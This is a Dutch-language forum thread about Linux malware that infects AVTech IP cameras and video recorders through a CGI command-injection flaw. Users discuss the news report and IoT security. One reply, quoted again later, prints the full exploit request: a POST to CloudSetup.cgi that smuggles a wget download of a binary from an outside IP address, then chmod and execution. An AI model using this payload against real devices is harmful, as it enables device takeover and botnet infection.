Linux-malware besmet ip-camera's en videorecorders via cgi-lek

  • Onderwerp starter Onderwerp starter Danvers
  • Startdatum Startdatum
  • Reacties 10
  • Weergaven 867
Onderzoekers hebben nieuwe Linux-malware gevonden die ip-camera's, digitale videorecorders en netwerkvideorecorders van fabrikant AVTech infecteert via een beveiligingslek dat eind vorig jaar openbaar werd gemaakt. De apparaten bleken 14 verschillende kwetsbaarheden te bevatten.
De onderzoekers waarschuwden de Taiwanese fabrikant op 19 oktober 2015, maar ontvingen geen reactie. In totaal werd er vier keer geprobeerd om contact op te nemen, maar alle keren zonder succes. Daarop werd besloten een jaar later de details vrij te geven. Op het moment van de openbaarmaking waren er zo'n 130.000 kwetsbare apparaten via internet te vinden. Eén van de onthulde kwetsbaarheden in een cgi-bestand wordt nu gebruikt om commando's op het apparaat uit te voeren.
Via deze commando's wordt de Linux-malware gedownload en uitgevoerd. Zodra de malware actief is verzamelt die informatie en netwerkgegevens. Ook kan de malware het apparaat ddos-aanvallen laten uitvoeren en andere apparaten op het netwerk infecteren, zo meldt het Japanse anti-virusbedrijf Trend Micro. Gebruikers krijgen het advies om het standaard beheerderswachtwoord aan te passen en de webinterface niet via internet toegankelijk te maken.

Bekijk bijlage 48
BRON
 
Dat is nogal een overdreven artikel vind ik . Wat ik wel zie is dat het cgi-bin bestand schrijfbaar is en daardoor misbruikt kan worden . Een lek is voor mij nog geen altijd geen malware .
 
Dat is nogal een overdreven artikel vind ik . Wat ik wel zie is dat het cgi-bin bestand schrijfbaar is en daardoor misbruikt kan worden . Een lek is voor mij nog geen altijd geen malware .
Sorry hoor dacht dat die bron toch betrouwbaar is.
We kunnen bericht verwijderen hoor, zeg het het maar ga er van uit dat je de expert bent.
Want slechte info voor de leden vind ikzelf niet kunnen.
Mvg
Danvers
 
Daar moet je geen expert voor zijn hoor om dat te zien , dat is gewoon de lees, schrijf en uitvoerrechten in Linux kennen .
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

CHMOD 0777
 
Daar moet je geen expert voor zijn hoor om dat te zien , dat is gewoon de lees, schrijf en uitvoerrechten in Linux kennen .
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

CHMOD 0777
Ok geen probleem, dan zou ik je plaats snel naar het bericht gaan ,zeggen tegen de schrijven, hallo man je bent verkeerd.
Volg dit dan wel, heb je gelijk dan gaat dit bericht weg.
Goede afspraak Swake???
Mvg
Danvers
P.S je link werkt niet!!!Bekijk bijlage 60
 
Het is al een paar jaar zo dat bedrijven met gesloten video circuits toch geconfronteerd worden met het openbaar maken van interne video's!
 
Laat maar staan danvers , is een intressant artikel
Je kan een map aanmaken en die openbaar schrijfbaar maken . Als ik een crimineel ben en ontdek dat die map schrijfbaar is , dan ga ik daar een met malware bestand naar die map uploaden .
Hier gaat het om files die van buitenaf door iedereen willekeurig kunnen uitgevoerd worden .
 
Het is algemeen bekend dat de Linux versie die gebruikt wordt door fabrikanten van I.O.T. apparatuur nu eenmaal een heel kaal en kwetsbaar besturingssysteempje is.
 
Wij weten dat Abraham, maar als je een leek gaat vertellen , ik ga met mijn smartphone eens je slimme koelkast hacken, die zal je misschien raar bekijken en vragen, Jij kijkt zeker veel naar film , ga ergens anders fantaseren .
 
Een paar jaar terug had een grappenmaker de smart tv van een goede kennis gehackt en had daardoor toegang tot in zijn PC gekregen.
En daardoor ging het spoken op het Google account van mijn kennis.

Nadat de WLAN via mijn notebook een uniek wachtwoord had gekregen en dat ook in de smart tv was geprogrammeerd was het kabaal voorbij.
Ook het wachtwoord van het Google account was tevens verbeterd.
 
Terug
Bovenaan Onderaan